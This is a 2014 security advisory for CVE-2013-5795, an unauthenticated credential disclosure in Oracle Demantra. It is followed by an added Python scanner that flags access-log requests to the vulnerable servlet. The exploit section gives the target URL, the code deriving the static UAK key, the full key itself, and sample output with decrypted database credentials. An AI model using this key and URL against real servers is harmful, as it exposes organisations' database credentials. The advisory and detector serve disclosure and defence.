Oracle Supply Chain Products Suite Remote Security Vulnerability (CVE-2013-5795)
Release date: 2014-01-14
Last updated: 2014-03-03
Affected systems:
Oracle Supply Chain Products Suite 9.3.1
Oracle Supply Chain Products Suite 9.3.0.2
Oracle Supply Chain Products Suite 7.3.1
Oracle Supply Chain Products Suite 7.3.0
Oracle Supply Chain Products Suite 7.2.0.3 SQL-Server
Description:
BUGTRAQ ID: 64846
CVE(CAN) ID: CVE-2013-5795
Oracle Demantra Demand Management is demand management software.
Oracle Demantra Demand Management versions 7.2.0.3 SQL-Server, 7.3.0, 7.3.1, 12.2.1, 12.2.2 and 12.2.3 contain a security vulnerability in their implementation that allows a remote attacker to obtain sensitive information.
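<*Source: Oracle
Links: http://secunia.com/advisories/56474
http://www.exploit-db.com/exploits/31995/
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!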
Demantra has a backend function that allows anyone to retrieve the database instance name and the corresponding credentials.
Impact:
A remote, unauthenticated attacker could exploit this issue in combination with other found issues, to extract the database credentials and instance name.
Exploit:
The target URL is:
http://target.com:8080/demantra/ServerDetailsServlet?UAK=
Now the UAK key is calculated statically:
String encryptedPassword = new String(CryptographicService.encodeHashStringHex("er6Us8wB", "SHA-256"));
StringBuffer tmp = new StringBuffer("sge");
tmp.append(0);
tmp.append(encryptedPassword);
uak = new String(CryptographicService.encodeHashStringHex(tmp.toString(), "SHA-256"));
From that information it is possible to create a simple extractor:
pixel:demantra user$ java getUAK
-=[Oracle Demantra Database Details Retriever ]=-
[+] UAK Key is: 406EDC5447A3A43551CDBA06535FB6A661F4DC1E56606915AC4E382D204B8DC1
[+] Retrieved the following encrypted string:
4,21,3,4,111,36,53,35,36,111,52,53,61,49,62,36,34,49,111,63,34,51,111,97,
[+] Decrypted string is:
TEST?test?demantra?orc?1
Together with the authentication bypass this can be exploited unauthenticated as well.
Recommendation:
Vendor patch:
Oracle
------
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's site:
http://www.oracle.com/technetwork/topics/security/
http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html#AppendixSCP
http://www.oracle.com/technetwork/topics/security/cpujan2014verbose-1972951.html#SCP
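For defenders reviewing exposure before or after patching, the following added example (not part of the original advisory or of Oracle's code) scans web access logs for requests to the ServerDetailsServlet path described above and ranks them by whether they carry the static UAK value printed in the advisory. The combined access-log format, the severity labels and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Static UAK value as printed in the advisory's tool output.
PUBLISHED_UAK = "406EDC5447A3A43551CDBA06535FB6A661F4DC1E56606915AC4E382D204B8DC1"
SERVLET = "/demantra/serverdetailsservlet"

# Common/combined access-log format (assumed; adjust to the real log layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def classify(line):
    """Return (severity, ip, status) for ServerDetailsServlet hits, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    # Decode percent-escapes and drop ";name=value" path parameters so that
    # trivially obfuscated request paths are still matched.
    path = unquote(parts.path).split(";", 1)[0].lower()
    if path != SERVLET:
        return None
    uak = parse_qs(parts.query, keep_blank_values=True).get("UAK", [""])[0]
    served = m["status"] == "200"
    if uak.upper() == PUBLISHED_UAK:
        # Known static key: credentials were likely returned if the server answered 200.
        sev = "critical" if served else "high"
    else:
        sev = "medium"  # probing of the backend function without the published key
    return sev, m["ip"], int(m["status"])

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [15/Jan/2014:10:02:11 +0000] "GET /demantra/ServerDetailsServlet?UAK=' + PUBLISHED_UAK + ' HTTP/1.1" 200 96',
    '198.51.100.7 - - [15/Jan/2014:10:02:15 +0000] "GET /demantra/%53erverDetailsServlet;x=1?UAK= HTTP/1.1" 404 0',
    '203.0.113.9 - - [15/Jan/2014:10:03:00 +0000] "GET /demantra/portal/login.jsp HTTP/1.1" 200 5120',
    '192.0.2.44 - - [15/Jan/2014:10:04:32 +0000] "GET /demantra/ServerDetailsServlet?UAK=406edc5447a3a43551cdba06535fb6a661f4dc1e56606915ac4e382d204b8dc1 HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for sev, ip, status in scan(SAMPLE):
        print(f"{sev:8} {ip:15} status={status}")
```

A "critical" hit means the database credentials should be treated as disclosed and rotated in addition to applying the vendor patch.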
